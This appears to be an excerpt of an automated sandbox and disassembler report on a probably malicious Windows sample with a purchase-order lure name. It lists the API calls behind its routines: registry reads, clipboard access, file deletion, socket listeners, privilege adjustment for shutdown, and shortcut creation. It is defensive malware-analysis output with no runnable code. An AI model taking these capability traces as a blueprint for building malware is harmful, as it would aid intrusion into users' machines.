                                                                                  • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0048054B
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004805E3
                                                                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00480822
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0048082F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                • String ID:
                                                                                • API String ID: 1240663315-0
                                                                                • Opcode ID: 458476e3a39306be6292dea122df7d430d7753f5c4d2246d62ccafb6d8a5f971
                                                                                • Instruction ID: efbac3d2c4afa975f371ae5d5fee671ec22ce1fa5a9a6cb729be810612663562
                                                                                • Opcode Fuzzy Hash: 458476e3a39306be6292dea122df7d430d7753f5c4d2246d62ccafb6d8a5f971
                                                                                • Instruction Fuzzy Hash: A5E16E71614200AFCB54EF25C891D2FBBE4EF89314B04896EF84ADB3A2D634ED45CB56
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                • String ID:
                                                                                • API String ID: 1737998785-0
                                                                                • Opcode ID: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                                                                                • Instruction ID: 6a8dd1f95291b63ae5b16d2a5a0d869dcb5166510358231783c1e180ef80644f
                                                                                • Opcode Fuzzy Hash: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                                                                                • Instruction Fuzzy Hash: CE2191352002109FDB00AF54EC09B6E7BA8EF44751F10847AF945E72A2EB38AC05CB5D
                                                                                APIs
                                                                                  • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                                                                  • Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004638A3
                                                                                • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0046394B
                                                                                • MoveFileW.KERNEL32(?,?), ref: 0046395E
                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0046397B
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046399D
                                                                                • FindClose.KERNEL32(00000000,?,?,?,?), ref: 004639B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                • String ID: \*.*
                                                                                • API String ID: 4002782344-1173974218
                                                                                • Opcode ID: 3f11042d7402f236aab81219c2fd7e0d2b8e7b9acbbe4fdc7f8742a531ec0f52
                                                                                • Instruction ID: 5f3270bf9419f81a9c4f0e0ab399985bb250d256c3569b2459e2ec67edc6ab47
                                                                                • Opcode Fuzzy Hash: 3f11042d7402f236aab81219c2fd7e0d2b8e7b9acbbe4fdc7f8742a531ec0f52
                                                                                • Instruction Fuzzy Hash: 5551717180514CAACF05EFA1C9929EEB778AF14319F60047EE40277191EB396F0DCB5A
                                                                                APIs
                                                                                  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0046F440
                                                                                • Sleep.KERNEL32(0000000A), ref: 0046F470
                                                                                • _wcscmp.LIBCMT ref: 0046F484
                                                                                • _wcscmp.LIBCMT ref: 0046F49F
                                                                                • FindNextFileW.KERNEL32(?,?), ref: 0046F53D
                                                                                • FindClose.KERNEL32(00000000), ref: 0046F553
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                • String ID: *.*
                                                                                • API String ID: 713712311-438819550
                                                                                • Opcode ID: e5d501dff5d889b604b2209ad413e00183518db45aed2e2415d7f621fa1a1f28
                                                                                • Instruction ID: 52678bcd3f78e7a2dee1500e624958e336d76892905c76040bb4fc6126c74c58
                                                                                • Opcode Fuzzy Hash: e5d501dff5d889b604b2209ad413e00183518db45aed2e2415d7f621fa1a1f28
                                                                                • Instruction Fuzzy Hash: D0418D71904219AFCF10EF64DC45AEFBBB4FF04314F50446BE855A2291EB38AE88CB59
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: __itow__swprintf
                                                                                • String ID: 3cA$_A
                                                                                • API String ID: 674341424-3480954128
                                                                                • Opcode ID: 5e64bbbaf19f084920888253dab756b3a75f3fd8efad323a8efc832b65d9b115
                                                                                • Instruction ID: 703a96bf305cb9905ff3d3c25826e0fcfbd93ba8a00a4d78e9854e8314894fca
                                                                                • Opcode Fuzzy Hash: 5e64bbbaf19f084920888253dab756b3a75f3fd8efad323a8efc832b65d9b115
                                                                                • Instruction Fuzzy Hash: AB229B716083009FD724DF14C881BABB7E4AF85314F11492EF89A97392DB78E945CB9B
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: _memmove
                                                                                • String ID:
                                                                                • API String ID: 4104443479-0
                                                                                • Opcode ID: c0a40cdccc9fe537faa311a02d76c88b90817d2a57610f6cfa77f1ede9afd5ea
                                                                                • Instruction ID: fe3fa380dd79410c0d4e58696af30f423fcd40af0ea7aa6f8d28fb308e13f721
                                                                                • Opcode Fuzzy Hash: c0a40cdccc9fe537faa311a02d76c88b90817d2a57610f6cfa77f1ede9afd5ea
                                                                                • Instruction Fuzzy Hash: 9D12AC70A00609DFCF04DFA5D981AEEB3F5FF88304F10452AE846A7291EB39AD55CB59
                                                                                APIs
                                                                                  • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                                                  • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                                                  • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 004651F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                • String ID: $@$SeShutdownPrivilege
                                                                                • API String ID: 2234035333-194228
                                                                                • Opcode ID: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                                                                                • Instruction ID: a9b7a44e2451b6884de2a96c8f52f71cfd0e95415fa4985b61f57267d5601e10
                                                                                • Opcode Fuzzy Hash: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                                                                                • Instruction Fuzzy Hash: D201F7317916116BF7286668ACAAFBB7358DB05345F2008BBFD03E21D2FD591C058A9F
                                                                                APIs
                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004762DC
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 004762EB
                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00476307
                                                                                • listen.WSOCK32(00000000,00000005), ref: 00476316
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00476330
                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00476344
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                • String ID:
                                                                                • API String ID: 1279440585-0
                                                                                • Opcode ID: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                                                                                • Instruction ID: 9cc0b371228dcaf8913226d6fe42490e105b9b769aefcc5547ebbaeef9b3f94b
                                                                                • Opcode Fuzzy Hash: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                                                                                • Instruction Fuzzy Hash: 6521F2312006049FCB10FF64C845A6EB7BAEF44324F15856EEC1AA73D2C734AC05CB59
                                                                                APIs
                                                                                  • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                  • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                • _memmove.LIBCMT ref: 00450258
                                                                                • _memmove.LIBCMT ref: 0045036D
                                                                                • _memmove.LIBCMT ref: 00450414
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 1300846289-0
                                                                                • Opcode ID: 7b39b4339eb409c41603910e355eb4aea2eb8ffb8365a16bb6f059eb92d4f5c7
                                                                                • Instruction ID: ce31bd404333394545349dab4fd8ad238969c684e33d592a62d2001407cdf1f6
                                                                                • Opcode Fuzzy Hash: 7b39b4339eb409c41603910e355eb4aea2eb8ffb8365a16bb6f059eb92d4f5c7
                                                                                • Instruction Fuzzy Hash: 3202E270A00205DBCF04DF65D9816AEBBF5EF84304F54806EE80ADB392EB39D955CB99
                                                                                APIs
                                                                                  • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 004019FA
                                                                                • GetSysColor.USER32(0000000F), ref: 00401A4E
                                                                                • SetBkColor.GDI32(?,00000000), ref: 00401A61
                                                                                  • Part of subcall function 00401290: DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ColorProc$LongWindow
                                                                                • String ID:
                                                                                • API String ID: 3744519093-0
                                                                                • Opcode ID: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                                                                                • Instruction ID: d041ec2a837aeb515327988813bafb0785b4d0a615f46c6b1421ede386c2745f
                                                                                • Opcode Fuzzy Hash: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                                                                                • Instruction Fuzzy Hash: A4A124B1202544BAE629BA694C88F7F255CDF45345F14053FF602F62F2CA3C9D429ABE
                                                                                APIs
                                                                                  • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0047679E
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 004767C7
                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00476800
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0047680D
                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00476821
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                • String ID:
                                                                                • API String ID: 99427753-0
                                                                                • Opcode ID: c3678cbd9f04907b78b21f7c60552e65a77e2ac58af8dde8cfff1331ff6b0f68
                                                                                • Instruction ID: 4f4fa4b069b112be458f20050bee2991dabce79e459f6d74e9331a247e2dcb9e
                                                                                • Opcode Fuzzy Hash: c3678cbd9f04907b78b21f7c60552e65a77e2ac58af8dde8cfff1331ff6b0f68
                                                                                • Instruction Fuzzy Hash: E941D275A00600AFDB10BF258C86F6E77A89F45718F05C56EFA59BB3C3CA789D008799
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                • String ID:
                                                                                • API String ID: 292994002-0
                                                                                • Opcode ID: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                                                                                • Instruction ID: 2bf7cd1b22f0a435aba1bf6783624a0e9851140f374647b9b1574053626a0f4e
                                                                                • Opcode Fuzzy Hash: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                                                                                • Instruction Fuzzy Hash: BB11B232700911ABEB217F269C44A6F7B99EF447A1B40483EFC45E3242DB789C0287AD
                                                                                APIs
                                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 44706859-0
                                                                                • Opcode ID: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                                                                • Instruction ID: 8dae455e1ba13099d0d58f164bb34b259a0b96a713bdc7d240504e0717c8d456
                                                                                • Opcode Fuzzy Hash: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                                                                • Instruction Fuzzy Hash: EBF08C30200614AFEB104FA4EC8CE6B3BACEF4A755B10043EF90592251DF649C09DB64
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 0046C432
                                                                                • CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046C44A
                                                                                  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                • CoUninitialize.OLE32 ref: 0046C6B7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                • String ID: .lnk
                                                                                • API String ID: 2683427295-24824748
                                                                                • Opcode ID: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
                                                                                • Instruction ID: adb56a4b7a52abdaef05598002f92e73435f728c8d9d90c66f29e414dbdf6fe1
                                                                                • Opcode Fuzzy Hash: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
                                                                                • Instruction Fuzzy Hash: 5AA14AB1104205AFD700EF55C881EAFB7E8EF85308F00492EF595972A2EB75EE09CB56
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00404AD0), ref: 00404B45
                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404B57
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
